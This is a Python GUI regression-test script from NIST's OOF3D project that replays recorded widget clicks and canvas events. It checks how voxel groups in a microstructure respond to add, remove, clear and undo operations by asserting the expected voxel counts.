43006f02a2e1ee32bfdba08206214be3411745c5 | 29,221 | py | Python | TEST3D/GUI/0010003_page_micro/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 31 | 2015-04-01T15:59:36.000Z | 2022-03-18T20:21:47.000Z | TEST3D/GUI/0010003_page_micro/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 3 | 2015-02-06T19:30:24.000Z | 2017-05-25T14:14:31.000Z | TEST3D/GUI/0010003_page_micro/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 7 | 2015-01-23T15:19:22.000Z | 2021-06-09T09:03:59.000Z | # -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
# We test how voxel selection groups are handled in a microstructure:
# in particular, the difference between Remove and Clear, and the ways a
# selection can be provided -- graphically, or via a specific method on the
# Voxel Selection page.
# This test is mainly directed at the way selections are handled through
# voxel groups.
import tests
findWidget('OOF3D').resize(550, 350)
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Microstructure')
checkpoint page installed Microstructure
findWidget('OOF3D:Microstructure Page:Pane').set_position(225)
# create a microstructure with loaded files
findWidget('OOF3D:Microstructure Page:NewFromFile').clicked()
checkpoint toplevel widget mapped Dialog-Load Image and create Microstructure
checkpoint meshable button set
findWidget('Dialog-Load Image and create Microstructure').resize(401, 215)
checkpoint microstructure page sensitized
findWidget('Dialog-Load Image and create Microstructure:filenames:Entire Directory:directory').set_text('.')
findWidget('Dialog-Load Image and create Microstructure:filenames:Entire Directory:directory').set_text('TEST_DATA/5color')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Auto').clicked()
checkpoint meshable button set
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('m')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('mi')
checkpoint microstructure page sensitized
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('mic')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('micr')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('micro')
findWidget('Dialog-Load Image and create Microstructure:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(603, 200)
findWidget('OOF3D:Microstructure Page:Pane').set_position(159)
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint active area status updated
checkpoint microstructure page sensitized
checkpoint Field page sensitized
checkpoint meshable button set
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Solver page sensitized
checkpoint microstructure page sensitized
checkpoint OOF.Microstructure.Create_From_ImageFile
# check that the new group button is sensitized
assert tests.sensitization1()
# open a graphics window
findMenu(findWidget('OOF3D:MenuBar'), 'Windows:Graphics:New').activate()
checkpoint Move Node toolbox info updated
checkpoint toplevel widget mapped OOF3D Graphics 1
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
checkpoint OOF.Windows.Graphics.New
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1').resize(1000, 800)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
# do some voxels selection
setComboBox(findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBChooser'), 'Voxel Selection')
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 3.5900000000000e+02,y= 1.6100000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 3.2400000000000e+02,y= 1.9400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 3.2400000000000e+02,y= 1.9400000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:select').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.6500000000000e+02,y= 4.4600000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 1.6500000000000e+02,y= 4.4600000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 4.7000000000000e+02,y= 3.3600000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 4.7000000000000e+02,y= 3.3600000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 2.8600000000000e+02,y= 1.4000000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 2.8600000000000e+02,y= 1.4000000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
# create a voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:New').clicked()
checkpoint toplevel widget mapped Dialog-Create new voxel group
findWidget('Dialog-Create new voxel group').resize(246, 67)
findWidget('Dialog-Create new voxel group:gtk-ok').clicked()
findWidget('OOF3D:Microstructure Page:Pane').set_position(225)
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint OOF.PixelGroup.New
checkpoint microstructure page sensitized
checkpoint meshable button set
# A group has been created in micro, but no voxels have been added
assert tests.sensitization3()
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (0 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (0 voxels, meshable)')
# create another voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:New').clicked()
checkpoint toplevel widget mapped Dialog-Create new voxel group
findWidget('Dialog-Create new voxel group').resize(246, 67)
findWidget('Dialog-Create new voxel group:gtk-ok').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint OOF.PixelGroup.New
# another group has been created but still no added voxels
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (0 voxels, meshable)', 'pixelgroup<2> (0 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (0 voxels, meshable)')
# select the first created voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((0,))
# add the voxel selection the first create voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# do some more voxels selection
findWidget('OOF3D').resize(550, 350)
findWidget('OOF3D Graphics 1').resize(1000, 800)
findWidget('OOF3D').resize(550, 350)
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 2.6500000000000e+02,y= 4.1400000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 3.9300000000000e+02,y= 2.9400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 3.9300000000000e+02,y= 2.9400000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:select').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.9300000000000e+02,y= 1.2800000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 1.9300000000000e+02,y= 1.2800000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 4.9800000000000e+02,y= 3.6600000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 4.9800000000000e+02,y= 3.6600000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.6400000000000e+02,y= 4.5300000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 1.6400000000000e+02,y= 4.5300000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
#Check that the current selected voxels group is not empty
assert tests.sensitization4()
# select the second voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((1,))
# now the current select voxels group has some voxels selection added
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (0 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (0 voxels, meshable)')
checkpoint microstructure page sensitized
assert tests.sensitization3()
# add the new selection to the select voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# now the two created voxels groups have some voxels selection added
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization4()
# undo the last added voxels
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBScroll:Voxel Selection:Undo').clicked()
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Undo
# there must be no effect after a undo
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization4()
# clear the whole selection
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBScroll:Voxel Selection:Clear').clicked()
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Clear
# there must be no effect after a clear
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization5()
# undo the clearing of the selection
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBScroll:Voxel Selection:Undo').clicked()
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Undo
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((0,))
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((1,))
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Remove').clicked()
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.RemoveSelection
# the remove deletes all the voxels except the one that had been undone.
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (1 voxel, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (1 voxel, meshable)')
# add the current selection to the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# the add provides the selected voxels again, so the counts are supposed to be back to their previous values
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization4()
# select the first voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((0,))
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Remove').clicked()
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.RemoveSelection
# another remove set the added voxels number to one as explained before
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (1 voxel, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (1 voxel, meshable)')
assert tests.sensitization4()
# clear the voxels selection in the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Clear').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.Clear
# the clear set definitely that number to 0
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (0 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (0 voxels, meshable)')
assert tests.sensitization3()
# add the current voxels selection to the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Introduction')
checkpoint page installed Introduction
findWidget('OOF3D:Navigation:Next').clicked()
checkpoint page installed Microstructure
findWidget('OOF3D:Navigation:Next').clicked()
checkpoint page installed Image
findWidget('OOF3D').resize(601, 350)
findWidget('OOF3D:Image Page:Pane').set_position(395)
findWidget('OOF3D:Navigation:Next').clicked()
checkpoint page installed Voxel Selection
findWidget('OOF3D:Voxel Selection Page:Pane').set_position(387)
checkpoint meshable button set
findWidget('OOF3D').resize(601, 350)
# add some selections to the current voxels group through the Voxel Selection Page
setComboBox(findWidget('OOF3D:Voxel Selection Page:Pane:SelectionModification:Method:Chooser'), 'Group')
findWidget('OOF3D:Voxel Selection Page:Pane').set_position(365)
findWidget('OOF3D:Voxel Selection Page:Pane:SelectionModification:OK').clicked()
checkpoint microstructure page sensitized
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.PixelSelection.Group
findWidget('OOF3D:Navigation:Prev').clicked()
checkpoint page installed Image
findWidget('OOF3D:Navigation:Prev').clicked()
checkpoint page installed Microstructure
findWidget('OOF3D:Microstructure Page:Pane').set_position(246)
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
checkpoint meshable button set
oldsize = window.setCanvasSize(614, 671)
# checking the voxels groups
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (5 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (5 voxels, meshable)')
assert tests.sensitization4()
# select other voxels
checkpoint microstructure page sensitized
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 3.1500000000000e+02,y= 1.3500000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 2.8700000000000e+02,y= 2.8600000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 2.8700000000000e+02,y= 2.8600000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:select').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 5.2700000000000e+02,y= 4.3800000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 5.2700000000000e+02,y= 4.3800000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 5.5300000000000e+02,y= 2.2900000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 5.5300000000000e+02,y= 2.2900000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 3.8000000000000e+01,y= 3.3300000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 3.8000000000000e+01,y= 3.3300000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
# add the current voxels selection to the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# checking the voxels groups
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (12 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (12 voxels, meshable)')
assert tests.sensitization4()
# quit OOF3D
widget_0=findWidget('OOF3D')
handled_0=widget_0.event(event(gtk.gdk.DELETE,window=widget_0.window))
checkpoint toplevel widget mapped Questioner
postpone if not handled_0: widget_0.destroy()
findWidget('Questioner').resize(359, 91)
findWidget('Questioner:gtk-delete').clicked()
checkpoint OOF.Graphics_1.File.Close
